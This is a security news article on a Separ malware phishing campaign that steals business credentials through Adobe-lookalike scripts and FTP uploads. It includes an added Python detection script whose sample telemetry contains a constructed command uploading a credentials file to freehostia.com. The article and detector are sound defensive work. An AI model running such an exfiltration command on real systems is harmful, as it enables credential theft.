Separ malware phishing campaign targets businesses

Researchers at Deep Instinct have released a report on a phishing campaign that is proving to be incredibly successful. The campaign targets business credentials using a new variant of the Separ malware. Separ has been in use since at least 2017, and it is itself based on credential-stealing malware that dates back as far as 2013.

The report describes Separ and its attack tactics as follows:

The credential stealer Separ is unique, as it uses a combination of very short script or batch files, and legitimate executables, to carry out all of its malicious business logic. Therefore, Separ is an excellent example of the advanced and evasive attack technique commonly termed as “Living Off the Land.” In addition, Separ masquerades as a fake Adobe related program, using a fake PDF document as the initial infection vector, and malicious scripts and executable files named to resemble Adobe related programs.

This particular chain of phishing email attacks focuses on “hundreds of companies” in Southeast Asia and the Middle East (though some companies in North America are also being targeted). The phishing emails goad users into downloading a PDF that launches a self-extractor. This self-extractor then calls wscript.exe to run the Visual Basic script adobel.vbs.

Once credentials have been collected, they are uploaded via the FTP client ancp.exe to freehostia.com (which, according to Deep Instinct, is a legitimate and noncriminal hosting service). Notably, the researchers found that “no attempt has been made by the attacker to evade analysis.” One reason for this, according to Deep Instinct, is that “the use of scripts and legitimate binaries, in a ‘Living off the Land’ scenario, means the Separ attacker successfully evades detection.”
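The two stages described above (a script host running an Adobe-lookalike .vbs, then a command-line FTP client pushing data to freehostia.com) can be matched against process-creation telemetry. The following is an added detection example, not code from the article or from Deep Instinct; the event records and the ancp.exe command-line syntax are constructed for illustration and do not reproduce the real tool's arguments.

```python
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
ADOBE_VBS = re.compile(r"adobe\w*\.vbs", re.IGNORECASE)  # matches adobel.vbs from the report
EXFIL_HOST = "freehostia.com"                             # legitimate host the report says is abused
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}  # ordinary visits are not suspicious

@dataclass
class ProcEvent:
    parent_image: str
    image: str
    cmdline: str

def basename(path: str) -> str:
    """Normalise a Windows or POSIX path down to its lower-cased file name."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def detect_separ_chain(events):
    """Return (rule, image) tuples; adds a 'separ_chain' finding when both stages are seen."""
    findings, seen = [], set()
    for ev in events:
        img = basename(ev.image)
        # Stage 1: wscript/cscript executing a .vbs whose name imitates an Adobe component
        if img in SCRIPT_HOSTS and ADOBE_VBS.search(ev.cmdline):
            findings.append(("script_host_adobe_lookalike", img))
            seen.add("stage1")
        # Stage 2: a non-browser process referencing the upload host on its command line
        if EXFIL_HOST in ev.cmdline.lower() and img not in BROWSERS:
            findings.append(("ftp_upload_to_freehostia", img))
            seen.add("stage2")
    if {"stage1", "stage2"} <= seen:
        findings.append(("separ_chain", "correlated"))
    return findings

# Constructed sample telemetry: two malicious events followed by two benign ones.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\u\AppData\Local\Temp\Adobe_Reader_DC.exe", r"C:\Windows\System32\wscript.exe",
              r'wscript.exe //B "C:\Users\u\AppData\Local\Temp\adobel.vbs"'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Users\u\AppData\Local\Temp\ancp.exe",
              r"ancp.exe creds.txt ftp.freehostia.com"),  # constructed syntax, not ancp's real flags
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
              r"Acrobat.exe report.pdf"),
    ProcEvent(r"C:\Windows\System32\gpscript.exe", r"C:\Windows\System32\wscript.exe",
              r"wscript.exe \\dc01\netlogon\logon.vbs"),
]

if __name__ == "__main__":
    for rule, img in detect_separ_chain(SAMPLE_EVENTS):
        print(rule, img)
```

The legitimate Acrobat launch and the group-policy logon script produce no findings, which is the point of keying on the script host plus the lookalike name rather than on "Adobe" alone.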

Additionally, it does not seem to matter to the threat actor in this scenario if people know their identity (a brash display of arrogance). Arrogance can be their downfall when the authorities catch up. Nobody in this day and age is untouchable as cybersecurity experts are getting better and better at anticipating criminal activity.

Featured image: Wikimedia

Derek Kortepeter

Derek Kortepeter is a graduate of UCLA and tech journalist that is committed to creating an informed society with regards to Information Security. Kortepeter specializes in areas such as penetration testing, cryptography, cyber warfare, and governmental InfoSec policy.
